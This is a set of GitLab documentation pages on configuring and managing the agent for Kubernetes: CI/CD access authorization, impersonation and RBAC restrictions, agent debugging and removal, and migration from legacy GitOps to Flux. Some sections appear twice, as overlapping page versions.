For a given connection, you can use a static identity for the impersonation.

Under the `access_as` key, add the `impersonate` key to make the request using the provided identity.
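For example, a minimal sketch of a static-identity configuration. The project path, username, and group name are placeholders; bind Kubernetes RBAC rules to the impersonated user or group to control what the job can do:

```yaml
ci_access:
  projects:
    - id: path/to/project # placeholder project path
      access_as:
        impersonate:
          username: gitlab-ci # placeholder cluster username
          groups:
            - ci-deployers # placeholder cluster group
```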
The identity can be specified with the following keys: - `username` (required) - `uid` - `groups` - `extra` See the [official Kubernetes documentation for details](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation). ## Restrict project and group access to specific environments {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/343885) in GitLab 15.7. {{< /history >}} By default, if your agent is [available to a project](#authorize-agent-access), all of the project's CI/CD jobs can use that agent. To restrict access to the agent to only jobs with specific environments, add `environments` to `ci_access.projects` or `ci_access.groups`. For example: ```yaml ci_access: projects: - id: path/to/project-1 - id: path/to/project-2 environments: - staging - review/* groups: - id: path/to/group-1 environments: - production ``` In this example: - All CI/CD jobs under `project-1` can access the agent. - CI/CD jobs under `project-2` with `staging` or `review/*` environments can access the agent. - `*` is a wildcard, so `review/*` matches all environments under `review`. - CI/CD jobs for projects under `group-1` with `production` environments can access the agent. ## Restrict access to the agent to protected branches {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/467936) in GitLab 17.3 [with a flag](../../../administration/feature_flags/_index.md) named `kubernetes_agent_protected_branches`. Disabled by default. - [Generally available](https://gitlab.com/gitlab-org/gitlab/-/issues/467936) in GitLab 17.10. Feature flag `kubernetes_agent_protected_branches` removed. 
{{< /history >}}

To restrict access to the agent to only jobs run on [protected branches](../../project/repository/branches/protected.md):

- Add `protected_branches_only: true` to `ci_access.projects` or `ci_access.groups`.

For example:

```yaml
ci_access:
  projects:
    - id: path/to/project-1
      protected_branches_only: true
  groups:
    - id: path/to/group-1
      protected_branches_only: true
      environments:
        - production
```

By default, `protected_branches_only` is set to `false`, and the agent can be accessed from unprotected and protected branches.

For additional security, you can combine this feature with [environment restrictions](#restrict-project-and-group-access-to-specific-environments).

If a project has multiple configurations, only the most specific configuration is used. For example, the following configuration grants access to unprotected branches in `example/my-project`, even though the `example` group is configured to grant access to only protected branches:

```yaml
# .gitlab/agents/my-agent/config.yaml
ci_access:
  projects:
    - id: example/my-project         # Project of the group below
      protected_branches_only: false # This configuration supersedes the group configuration
      environments:
        - dev
  groups:
    - id: example
      protected_branches_only: true
      environments:
        - dev
```

For more details, see [Access to Kubernetes from CI/CD](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/kubernetes_ci_access.md#apiv4joballowed_agents-api).
## Related topics

- [Self-paced classroom workshop](https://gitlab-for-eks.awsworkshop.io) (uses AWS EKS, but you can use it for other Kubernetes clusters)
- [Configure Auto DevOps](../../../topics/autodevops/cloud_deployments/auto_devops_with_gke.md#configure-auto-devops)

## Troubleshooting

### Grant write permissions to `~/.kube/cache`

Tools like `kubectl`, Helm, `kpt`, and `kustomize` cache information about the cluster in `~/.kube/cache`. If this directory is not writable, the tool fetches information on each invocation, making interactions slower and creating unnecessary load on the cluster. For the best experience, in the image you use in your `.gitlab-ci.yml` file, ensure this directory is writable.

### Enable TLS

If you are on GitLab Self-Managed, ensure your instance is configured with Transport Layer Security (TLS).

If you attempt to use `kubectl` without TLS, you might get an error like:

```shell
$ kubectl get pods
error: You must be logged in to the server (the server has asked for the client to provide credentials)
```

### Unable to connect to the server: certificate signed by unknown authority

If you use an environment with KAS and a self-signed certificate, your `kubectl` call might return this error:

```plaintext
kubectl get pods
Unable to connect to the server: x509: certificate signed by unknown authority
```

The error occurs because the job does not trust the certificate authority (CA) that signed the KAS certificate. To resolve the issue, [configure `kubectl` to trust the CA](#environments-with-kas-that-use-self-signed-certificates).
### Validation errors

If you use `kubectl` versions v1.27.0 or v1.27.1, you might get the following error:

```plaintext
error: error validating "file.yml": error validating data: the server responded with the status code 426 but did not return more information; if you choose to ignore these errors, turn validation off with --validate=false
```

This issue is caused by [a bug](https://github.com/kubernetes/kubernetes/issues/117463) with `kubectl` and other tools that use the shared Kubernetes libraries. To resolve the issue, use another version of `kubectl`.
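For example, you might pin the job image to an unaffected `kubectl` release. The image tag shown is illustrative; pick any available tag outside the affected versions, and replace the agent context placeholder with your own:

```yaml
deploy:
  image:
    name: bitnami/kubectl:1.28 # example tag; any kubectl version without the validation bug works
    entrypoint: ['']
  script:
    # path/to/agent/project:agent-name is a placeholder for your agent's context
    - kubectl config use-context path/to/agent/project:agent-name
    - kubectl apply -f file.yml
```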
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Using GitLab CI/CD with a Kubernetes cluster breadcrumbs: - doc - user - clusters - agent --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - Agent connection sharing limit [changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/149844) from 100 to 500 in GitLab 17.0. {{< /history >}} You can use GitLab CI/CD to safely connect, deploy, and update your Kubernetes clusters. To do so, [install an agent in your cluster](install/_index.md). When done, you have a Kubernetes context and can run Kubernetes API commands in your GitLab CI/CD pipeline. To ensure access to your cluster is safe: - Each agent has a separate context (`kubecontext`). - Only the project where the agent is configured, and any additional projects you authorize, can access the agent in your cluster. To use GitLab CI/CD to interact with your cluster, runners must be registered with GitLab. However, these runners do not have to be in the cluster where the agent is. Prerequisites: - Make sure [GitLab CI/CD is enabled](../../../ci/pipelines/settings.md#disable-gitlab-cicd-pipelines). ## Use GitLab CI/CD with your cluster To update a Kubernetes cluster with GitLab CI/CD: 1. Ensure you have a working Kubernetes cluster and the manifests are in a GitLab project. 1. In the same GitLab project, [register and install the GitLab agent for Kubernetes](install/_index.md). 1. [Update your `.gitlab-ci.yml` file](#update-your-gitlab-ciyml-file-to-run-kubectl-commands) to select the agent's Kubernetes context and run the Kubernetes API commands. 1. Run your pipeline to deploy to or update the cluster. If you have multiple GitLab projects that contain Kubernetes manifests: 1. 
[Install the GitLab agent for Kubernetes](install/_index.md) in its own project, or in one of the GitLab projects where you keep Kubernetes manifests. 1. [Authorize agent access](#authorize-agent-access) in your GitLab projects. 1. Optional. For added security, [use impersonation](#restrict-project-and-group-access-by-using-impersonation). 1. [Update your `.gitlab-ci.yml` file](#update-your-gitlab-ciyml-file-to-run-kubectl-commands) to select the agent's Kubernetes context and run the Kubernetes API commands. 1. Run your pipeline to deploy to or update the cluster. ## Authorize agent access If you have multiple projects with Kubernetes manifests, you must authorize these projects to access the agent. You can authorize agent access for individual projects, groups, or subgroups so all projects have access. For added security, you can also [use impersonation](#restrict-project-and-group-access-by-using-impersonation). Authorization configuration can take one or two minutes to propagate. ### Authorize your projects to access the agent {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/346566) to remove hierarchy restrictions in GitLab 15.6. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/356831) to allow authorizing projects in a user namespace in GitLab 15.7. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/377932) to allow the authorization of groups that belong to different top-level groups in GitLab 18.1. {{< /history >}} To authorize the GitLab project where you keep Kubernetes manifests to access the agent: 1. On the left sidebar, select **Search or go to** and find the project that contains the [agent configuration file](install/_index.md#create-an-agent-configuration-file) (`config.yaml`). 1. Edit the `config.yaml` file. Under the `ci_access` keyword, add the `projects` attribute. 1. For the `id`, add the path to the project. 
```yaml ci_access: projects: - id: path/to/project ``` - Authorized projects must have the same top-level group or user namespace as the agent's configuration project, unless the [instance level authorization](#authorize-all-projects-in-your-gitlab-instance-to-access-the-agent) application setting is enabled. - You can install additional agents into the same cluster to accommodate additional hierarchies. - You can authorize up to 500 projects. After making these changes: - All CI/CD jobs now include a `kubeconfig` file with contexts for every shared agent connection. - The `kubeconfig` path is available in the `$KUBECONFIG` environment variable. - You can choose the context to run `kubectl` commands from your CI/CD scripts. ### Authorize projects in your groups to access the agent {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/346566) to remove hierarchy restrictions in GitLab 15.6. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/377932) to allow the authorization of groups that belong to different top-level groups in GitLab 18.1. {{< /history >}} To authorize all of the GitLab projects in a group or subgroup to access the agent: 1. On the left sidebar, select **Search or go to** and find the project that contains the [agent configuration file](install/_index.md#create-an-agent-configuration-file) (`config.yaml`). 1. Edit the `config.yaml` file. Under the `ci_access` keyword, add the `groups` attribute. 1. For the `id`, add the path: ```yaml ci_access: groups: - id: path/to/group/subgroup ``` - Authorized groups must have the same top-level group as the agent's configuration project, unless the [instance level authorization](#authorize-all-projects-in-your-gitlab-instance-to-access-the-agent) application setting is enabled. - You can install additional agents into the same cluster to accommodate additional hierarchies. 
- All of the subgroups of an authorized group also have access to the same agent (without being specified individually). - You can authorize up to 500 groups. After making these changes: - All the projects that belong to the group and its subgroups are now authorized to access the agent. - All CI/CD jobs now include a `kubeconfig` file with contexts for every shared agent connection. - The `kubeconfig` path is available in the `$KUBECONFIG` environment variable. - You can choose the context to run `kubectl` commands from your CI/CD scripts. ### Authorize all projects in your GitLab instance to access the agent {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/357516) in GitLab 17.11. {{< /history >}} Prerequisites: - You must be an administrator. To allow agents to be configured to authorize all projects in your GitLab instance: {{< tabs >}} {{< tab title="Using the UI" >}} 1. In the **Admin** area, select **Settings > General**, and expand the **GitLab agent for Kubernetes** section. 1. Select **Enable instance level authorization**. 1. Select **Save changes**. {{< /tab >}} {{< tab title="Using the API" >}} 1. [Update the application setting](../../../api/settings.md#update-application-settings) `organization_cluster_agent_authorization_enabled` to `true`. {{< /tab >}} {{< /tabs >}} To authorize the agent to access all of the GitLab projects: 1. On the left sidebar, select **Search or go to** and find the project that contains the [agent configuration file](install/_index.md#create-an-agent-configuration-file) (`config.yaml`). 1. Edit the `config.yaml` file. Under the `ci_access` keyword, add the `instance` attribute: ```yaml ci_access: instance: {} ``` After making these changes to the agent configuration file: - All CI/CD jobs in all projects in your instance are authorized to access the agent. 
You can use CI/CD job impersonation with RBAC to grant or restrict access as needed. For more information, see [Restrict project and group access by using impersonation](#restrict-project-and-group-access-by-using-impersonation). - All CI/CD jobs include a `kubeconfig` file with contexts for every shared agent connection. - The `kubeconfig` path is available in the `$KUBECONFIG` environment variable. - You can choose the context to run `kubectl` commands from your CI/CD scripts. ## Update your `.gitlab-ci.yml` file to run `kubectl` commands In the project where you want to run Kubernetes commands, edit your project's `.gitlab-ci.yml` file. In the first command under the `script` keyword, set your agent's context. Use the format `<path/to/agent/project>:<agent-name>`. For example: ```yaml deploy: image: name: bitnami/kubectl:latest entrypoint: [''] script: - kubectl config get-contexts - kubectl config use-context path/to/agent/project:agent-name - kubectl get pods ``` If you are not sure what your agent's context is, run `kubectl config get-contexts` from a CI/CD job where you want to access the agent. ### Environments that use Auto DevOps If Auto DevOps is enabled, you must define the CI/CD variable `KUBE_CONTEXT`. Set the value of `KUBE_CONTEXT` to the context of the agent you want Auto DevOps to use: ```yaml deploy: variables: KUBE_CONTEXT: path/to/agent/project:agent-name ``` You can assign different agents to separate Auto DevOps jobs. For instance, Auto DevOps can use one agent for `staging` jobs, and another agent for `production` jobs. To use multiple agents, define an [environment-scoped CI/CD variable](../../../ci/environments/_index.md#limit-the-environment-scope-of-a-cicd-variable) for each agent. For example: 1. Define two variables named `KUBE_CONTEXT`. 1. For the first variable: 1. Set the `environment` to `staging`. 1. Set the value to the context of your staging agent. 1. For the second variable: 1. Set the `environment` to `production`. 1. 
Set the value to the context of your production agent. ### Environments with both certificate-based and agent-based connections When you deploy to an environment that has both a [certificate-based cluster](../../infrastructure/clusters/_index.md) (deprecated) and an agent connection: - The certificate-based cluster's context is called `gitlab-deploy`. This context is always selected by default. - Agent contexts are included in `$KUBECONFIG`. You can select them by using `kubectl config use-context <path/to/agent/project>:<agent-name>`. To use an agent connection when certificate-based connections are present, you can manually configure a new `kubectl` configuration context. For example: ```yaml deploy: variables: KUBE_CONTEXT: my-context # The name to use for the new context AGENT_ID: 1234 # replace with your agent's numeric ID K8S_PROXY_URL: https://<KAS_DOMAIN>/k8s-proxy/ # For agent server (KAS) deployed in Kubernetes cluster (for gitlab.com use kas.gitlab.com); replace with your URL # K8S_PROXY_URL: https://<GITLAB_DOMAIN>/-/kubernetes-agent/k8s-proxy/ # For agent server (KAS) in Omnibus # Include any additional variables before_script: - kubectl config set-credentials agent:$AGENT_ID --token="ci:${AGENT_ID}:${CI_JOB_TOKEN}" - kubectl config set-cluster gitlab --server="${K8S_PROXY_URL}" - kubectl config set-context "$KUBE_CONTEXT" --cluster=gitlab --user="agent:${AGENT_ID}" - kubectl config use-context "$KUBE_CONTEXT" # Include the remaining job configuration ``` ### Environments with KAS that use self-signed certificates If you use an environment with KAS and a self-signed certificate, you must configure your Kubernetes client to trust the certificate authority (CA) that signed your certificate. To configure your client, do one of the following: - Set a CI/CD variable `SSL_CERT_FILE` with the KAS certificate in PEM format. 
- Configure the Kubernetes client with `--certificate-authority=$KAS_CERTIFICATE`, where `KAS_CERTIFICATE` is a CI/CD variable with the CA certificate of KAS. - Place the certificates in an appropriate location in the job container by updating the container image or mounting via the runner. - Not recommended. Configure the Kubernetes client with `--insecure-skip-tls-verify=true`. ## Restrict project and group access by using impersonation {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/357934) in GitLab 15.5 to add impersonation support for environment tiers. {{< /history >}} By default, your CI/CD job inherits all the permissions from the service account used to install the agent in the cluster. To restrict access to your cluster, you can use [impersonation](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation). To specify impersonations, use the `access_as` attribute in your agent configuration file and use Kubernetes RBAC rules to manage impersonated account permissions. You can impersonate: - The agent itself (default). - The CI/CD job that accesses the cluster. - A specific user or system account defined within the cluster. Authorization configuration can take one or two minutes to propagate. ### Impersonate the agent The agent is impersonated by default. You don't need to do anything to impersonate it. ### Impersonate the CI/CD job that accesses the cluster To impersonate the CI/CD job that accesses the cluster, under the `access_as` key, add the `ci_job: {}` key-value. When the agent makes the request to the actual Kubernetes API, it sets the impersonation credentials in the following way: - `UserName` is set to `gitlab:ci_job:<job id>`. Example: `gitlab:ci_job:1074499489`. - `Groups` is set to: - `gitlab:ci_job` to identify all requests coming from CI jobs. 
- The list of IDs of groups the project is in. - The project ID. - The slug and tier of the environment this job belongs to. Example: for a CI job in `group1/group1-1/project1` where: - Group `group1` has ID 23. - Group `group1/group1-1` has ID 25. - Project `group1/group1-1/project1` has ID 150. - Job running in the `prod` environment, which has the `production` environment tier. Group list would be `[gitlab:ci_job, gitlab:group:23, gitlab:group_env_tier:23:production, gitlab:group:25, gitlab:group_env_tier:25:production, gitlab:project:150, gitlab:project_env:150:prod, gitlab:project_env_tier:150:production]`. - `Extra` carries extra information about the request. The following properties are set on the impersonated identity: | Property | Description | | ------------------------------------ | ---------------------------------------------------------------------------- | | `agent.gitlab.com/id` | Contains the agent ID. | | `agent.gitlab.com/config_project_id` | Contains the agent's configuration project ID. | | `agent.gitlab.com/project_id` | Contains the CI project ID. | | `agent.gitlab.com/ci_pipeline_id` | Contains the CI pipeline ID. | | `agent.gitlab.com/ci_job_id` | Contains the CI job ID. | | `agent.gitlab.com/username` | Contains the username of the user the CI job is running as. | | `agent.gitlab.com/environment_slug` | Contains the slug of the environment. Only set if running in an environment. | | `agent.gitlab.com/environment_tier` | Contains the tier of the environment. Only set if running in an environment. | Example `config.yaml` to restrict access by the CI/CD job's identity: ```yaml ci_access: projects: - id: path/to/project access_as: ci_job: {} ``` #### Example RBAC to restrict CI/CD jobs The following `RoleBinding` resource restricts all CI/CD jobs to view rights only. 
```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: ci-job-view
roleRef:
  name: view
  kind: ClusterRole
  apiGroup: rbac.authorization.k8s.io
subjects:
  - name: gitlab:ci_job
    kind: Group
```

### Impersonate a static identity

For a given connection, you can use a static identity for the impersonation.

Under the `access_as` key, add the `impersonate` key to make the request using the provided identity.

The identity can be specified with the following keys:

- `username` (required)
- `uid`
- `groups`
- `extra`

See the [official Kubernetes documentation for details](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation).

## Restrict project and group access to specific environments

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/343885) in GitLab 15.7.

{{< /history >}}

By default, if your agent is [available to a project](#authorize-agent-access), all of the project's CI/CD jobs can use that agent.

To restrict access to the agent to only jobs with specific environments, add `environments` to `ci_access.projects` or `ci_access.groups`. For example:

```yaml
ci_access:
  projects:
    - id: path/to/project-1
    - id: path/to/project-2
      environments:
        - staging
        - review/*
  groups:
    - id: path/to/group-1
      environments:
        - production
```

In this example:

- All CI/CD jobs under `project-1` can access the agent.
- CI/CD jobs under `project-2` with `staging` or `review/*` environments can access the agent.
  - `*` is a wildcard, so `review/*` matches all environments under `review`.
- CI/CD jobs for projects under `group-1` with `production` environments can access the agent.
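Tying the static-identity impersonation described earlier back to cluster RBAC, a minimal configuration sketch might look like the following; the `gitlab-ci` username and `ci-deployers` group are placeholders that you would bind to permissions with your own `RoleBinding` or `ClusterRoleBinding` resources:

```yaml
ci_access:
  projects:
    - id: path/to/project
      access_as:
        impersonate:
          username: gitlab-ci    # placeholder identity; the only required key
          groups:
            - ci-deployers       # placeholder group to target in your RBAC bindings
```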
## Restrict access to the agent to protected branches

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/467936) in GitLab 17.3 [with a flag](../../../administration/feature_flags/_index.md) named `kubernetes_agent_protected_branches`. Disabled by default.
- [Generally available](https://gitlab.com/gitlab-org/gitlab/-/issues/467936) in GitLab 17.10. Feature flag `kubernetes_agent_protected_branches` removed.

{{< /history >}}

{{< alert type="flag" >}}

The availability of this feature is controlled by a feature flag. For more information, see the history. This feature is available for testing, but not ready for production use.

{{< /alert >}}

To restrict access to the agent to only jobs run on [protected branches](../../project/repository/branches/protected.md):

- Add `protected_branches_only: true` to `ci_access.projects` or `ci_access.groups`.

For example:

```yaml
ci_access:
  projects:
    - id: path/to/project-1
      protected_branches_only: true
  groups:
    - id: path/to/group-1
      protected_branches_only: true
      environments:
        - production
```

By default, `protected_branches_only` is set to `false`, and the agent can be accessed from unprotected and protected branches.

For additional security, you can combine this feature with [environment restrictions](#restrict-project-and-group-access-to-specific-environments).

If a project has multiple configurations, only the most specific configuration is used.
For example, the following configuration grants access to unprotected branches in `example/my-project`, even though the `example` group is configured to grant access to only protected branches:

```yaml
# .gitlab/agents/my-agent/config.yaml
ci_access:
  projects:
    - id: example/my-project # Project of the group below
      protected_branches_only: false # This configuration supersedes the group configuration
      environments:
        - dev
  groups:
    - id: example
      protected_branches_only: true
      environments:
        - dev
```

For more details, see [Access to Kubernetes from CI/CD](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/kubernetes_ci_access.md#apiv4joballowed_agents-api).

## Related topics

- [Self-paced classroom workshop](https://gitlab-for-eks.awsworkshop.io) (uses AWS EKS, but you can adapt it for other Kubernetes clusters)
- [Configure Auto DevOps](../../../topics/autodevops/cloud_deployments/auto_devops_with_gke.md#configure-auto-devops)

## Troubleshooting

### Grant write permissions to `~/.kube/cache`

Tools like `kubectl`, Helm, `kpt`, and `kustomize` cache information about the cluster in `~/.kube/cache`. If this directory is not writable, the tool fetches information on each invocation, making interactions slower and creating unnecessary load on the cluster. For the best experience, in the image you use in your `.gitlab-ci.yml` file, ensure this directory is writable.

### Enable TLS

If you are on GitLab Self-Managed, ensure your instance is configured with Transport Layer Security (TLS).
If you attempt to use `kubectl` without TLS, you might get an error like:

```shell
$ kubectl get pods
error: You must be logged in to the server (the server has asked for the client to provide credentials)
```

### Unable to connect to the server: certificate signed by unknown authority

If you use an environment with KAS and a self-signed certificate, your `kubectl` call might return this error:

```plaintext
kubectl get pods
Unable to connect to the server: x509: certificate signed by unknown authority
```

The error occurs because the job does not trust the certificate authority (CA) that signed the KAS certificate. To resolve the issue, [configure `kubectl` to trust the CA](#environments-with-kas-that-use-self-signed-certificates).

### Validation errors

If you use `kubectl` versions v1.27.0 or v1.27.1, you might get the following error:

```plaintext
error: error validating "file.yml": error validating data: the server responded with the status code 426 but did not return more information; if you choose to ignore these errors, turn validation off with --validate=false
```

This issue is caused by [a bug](https://github.com/kubernetes/kubernetes/issues/117463) with `kubectl` and other tools that use the shared Kubernetes libraries. To resolve the issue, use another version of `kubectl`.
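One way to avoid the affected releases is to pin a known-good `kubectl` version in the job image. This `.gitlab-ci.yml` sketch is illustrative only: the `bitnami/kubectl` image tag and the agent context path are placeholders you would replace with your own values:

```yaml
deploy:
  image:
    name: bitnami/kubectl:1.27.4   # placeholder tag for a release without the validation bug
    entrypoint: ['']
  script:
    - kubectl config use-context path/to/agent/project:agent-name  # placeholder agent context
    - kubectl apply -f file.yml
```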
# Managing the agent for Kubernetes instances

Source: <https://docs.gitlab.com/user/clusters/work_with_agent>
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Use the following tasks when you work with the agent for Kubernetes.

## View your agents

The installed `agentk` version is displayed on the **Agent** tab.

Prerequisites:

- You must have at least the Developer role.

To view the list of agents:

1. On the left sidebar, select **Search or go to** and find the project that contains your agent configuration file. You cannot view registered agents from a project that does not contain the agent configuration file.
1. Select **Operate > Kubernetes clusters**.
1. Select the **Agent** tab to view clusters connected to GitLab through the agent.

On this page, you can view:

- All the registered agents for the current project.
- The connection status.
- The version of `agentk` installed on your cluster.
- The path to each agent configuration file.

### Configure your agent

To configure your agent:

- Add content to the `config.yaml` file optionally created [during installation](install/_index.md#create-an-agent-configuration-file).

You can quickly locate an agent configuration file from the list of agents. The **Configuration** column indicates the location of the `config.yaml` file, or shows how to create one.

The agent configuration file manages the various agent features:

- For a GitLab CI/CD workflow. You must [authorize the agent to access your projects](ci_cd_workflow.md#authorize-agent-access), and then [add `kubectl` commands to your `.gitlab-ci.yml` file](ci_cd_workflow.md#update-your-gitlab-ciyml-file-to-run-kubectl-commands).
- For [user access](user_access.md) to the cluster from the GitLab UI or from the local terminal.
- For configuring [operational container scanning](vulnerabilities.md).
- For configuring [remote workspaces](../../workspace/gitlab_agent_configuration.md).

## View shared agents

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/395498) in GitLab 16.1.
{{< /history >}}

In addition to the agents owned by your project, you can also view agents shared with the [`ci_access`](ci_cd_workflow.md) and [`user_access`](user_access.md) keywords. Once an agent is shared with a project, it automatically appears in the project agent tab.

To view the list of shared agents:

1. On the left sidebar, select **Search or go to** and find your project.
1. Select **Operate > Kubernetes clusters**.
1. Select the **Agent** tab.

The list of shared agents and their clusters are displayed.

## View an agent's activity information

The activity logs help you to identify problems and get the information you need for troubleshooting. You can see events from a week before the current date.

To view an agent's activity:

1. On the left sidebar, select **Search or go to** and find the project that contains your agent configuration file.
1. Select **Operate > Kubernetes clusters**.
1. Select the agent you want to see activity for.

The activity list includes:

- Agent registration events: When a new token is **created**.
- Connection events: When an agent is successfully **connected** to a cluster.

The connection status is logged when you connect an agent for the first time or after more than an hour of inactivity.

View and provide feedback about the UI in [this epic](https://gitlab.com/groups/gitlab-org/-/epics/4739).

## Debug the agent

{{< history >}}

- The `grpc_level` was [introduced](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/merge_requests/669) in GitLab 15.1.

{{< /history >}}

To debug the cluster-side component (`agentk`) of the agent, set the log level according to the available options:

- `error`
- `info`
- `debug`

The agent has two loggers:

- A general purpose logger, which defaults to `info`.
- A gRPC logger, which defaults to `error`.
You can change your log levels by using a top-level `observability` section in the [agent configuration file](#configure-your-agent), for example setting the levels to `debug` and `warn`:

```yaml
observability:
  logging:
    level: debug
    grpc_level: warn
```

When `grpc_level` is set to `info` or below, there are a lot of gRPC logs.

Commit the configuration changes and inspect the agent service logs:

```shell
kubectl logs -f -l=app=gitlab-agent -n gitlab-agent
```

For more information about debugging, see [troubleshooting documentation](troubleshooting.md).

## Reset the agent token

{{< history >}}

- Two-token limit [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/361030/) in GitLab 16.1 with a [flag](../../../administration/feature_flags/_index.md) named `cluster_agents_limit_tokens_created`.
- Two-token limit [generally available](https://gitlab.com/gitlab-org/gitlab/-/issues/412399) in GitLab 16.2. Feature flag `cluster_agents_limit_tokens_created` removed.

{{< /history >}}

An agent can have only two active tokens at one time. To reset the agent token without downtime:

1. Create a new token:
   1. On the left sidebar, select **Search or go to** and find your project.
   1. Select **Operate > Kubernetes clusters**.
   1. Select the agent you want to create a token for.
   1. On the **Access tokens** tab, select **Create token**.
   1. Enter the token's name and optional description, and select **Create token**.
   1. Securely store the generated token.
1. Use the token to [install the agent in your cluster](install/_index.md#install-the-agent-in-the-cluster) and to [update the agent](install/_index.md#update-the-agent-version) to another version.
1. To delete the token you're no longer using, return to the token list and select **Revoke** ({{< icon name="remove" >}}).

## Remove an agent

You can remove an agent by using the [GitLab UI](#remove-an-agent-through-the-gitlab-ui) or the [GraphQL API](#remove-an-agent-with-the-gitlab-graphql-api).
The agent and any associated tokens are removed from GitLab, but no changes are made in your Kubernetes cluster. You must clean up those resources manually.

### Remove an agent through the GitLab UI

To remove an agent from the UI:

1. On the left sidebar, select **Search or go to** and find the project that contains the agent configuration file.
1. Select **Operate > Kubernetes clusters**.
1. In the table, in the row for your agent, in the **Options** column, select the vertical ellipsis ({{< icon name="ellipsis_v" >}}).
1. Select **Delete agent**.

### Remove an agent with the GitLab GraphQL API

1. Get the `<cluster-agent-token-id>` from a query in the interactive GraphQL explorer.

   - For GitLab.com, go to <https://gitlab.com/-/graphql-explorer> to open GraphQL Explorer.
   - For GitLab Self-Managed, go to `https://gitlab.example.com/-/graphql-explorer`, replacing `gitlab.example.com` with your instance's URL.

   ```graphql
   query{
     project(fullPath: "<full-path-to-agent-configuration-project>") {
       clusterAgent(name: "<agent-name>") {
         id
         tokens {
           edges {
             node {
               id
             }
           }
         }
       }
     }
   }
   ```

1. Remove an agent record with GraphQL by deleting the `clusterAgentToken`.

   ```graphql
   mutation deleteAgent {
     clusterAgentDelete(input: { id: "<cluster-agent-id>" } ) {
       errors
     }
   }

   mutation deleteToken {
     clusterAgentTokenDelete(input: { id: "<cluster-agent-token-id>" }) {
       errors
     }
   }
   ```

1. Verify whether the removal occurred successfully. If the output in the Pod logs includes `unauthenticated`, it means that the agent was successfully removed:

   ```json
   {
     "level": "warn",
     "time": "2021-04-29T23:44:07.598Z",
     "msg": "GetConfiguration.Recv failed",
     "error": "rpc error: code = Unauthenticated desc = unauthenticated"
   }
   ```

1. Delete the agent in your cluster:

   ```shell
   kubectl delete -n gitlab-kubernetes-agent -f ./resources.yml
   ```

## Related topics

- [Manage an agent's workspaces](../../workspace/_index.md#manage-workspaces-at-the-agent-level)
# Migrate from legacy GitOps to Flux

Source: <https://docs.gitlab.com/user/clusters/agent/migrate_to_flux>
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Most users can migrate from their legacy agent-based GitOps solution to Flux without additional work or downtime. In most cases, Flux can take over existing workloads without any restarts.

## Example GitOps configuration

Your legacy GitOps setup might contain an agent configuration like:

```yaml
gitops:
  manifest_projects:
    - id: <your-group>/<your-repository>
      paths:
        - glob: 'manifests/*.yaml'
```

The `manifests` directory referenced in the `paths.glob` might have two manifests. One manifest defines a `Namespace`:

```yaml
# /manifests/namespace.yaml
---
apiVersion: v1
kind: Namespace
metadata:
  name: production
```

And the other manifest defines a `Deployment`:

```yaml
# /manifests/deployment.yaml
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  namespace: production
  labels:
    app: nginx
spec:
  replicas: 3
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
        - name: nginx
          image: nginx:1.14.2
          ports:
            - containerPort: 80
```

The topics on this page use this configuration to demonstrate a migration to Flux.

## Disable legacy GitOps functionality in the agent

When the GitOps configuration is removed, the agent doesn't delete any running workloads it applied.

To remove the GitOps functionality from your agent:

- Delete the `gitops` section from the agent configuration file. You still need a functional agent, so don't delete your entire `config.yaml` file.

If you have multiple items under `gitops.manifest_projects` or under the `paths` list, you can migrate one part at a time by removing only the specific project or path.

## Bootstrap Flux

Before you begin:

- You disabled the GitOps functionality in your agent.
- You installed the Flux CLI in a terminal with access to your cluster.

To bootstrap Flux:

- In your terminal, run the `flux bootstrap gitlab` command.
For example:

```shell
flux bootstrap gitlab \
  --owner=<your-group> \
  --repository=<your-repository> \
  --branch=main \
  --path=manifests/ \
  --deploy-token-auth
```

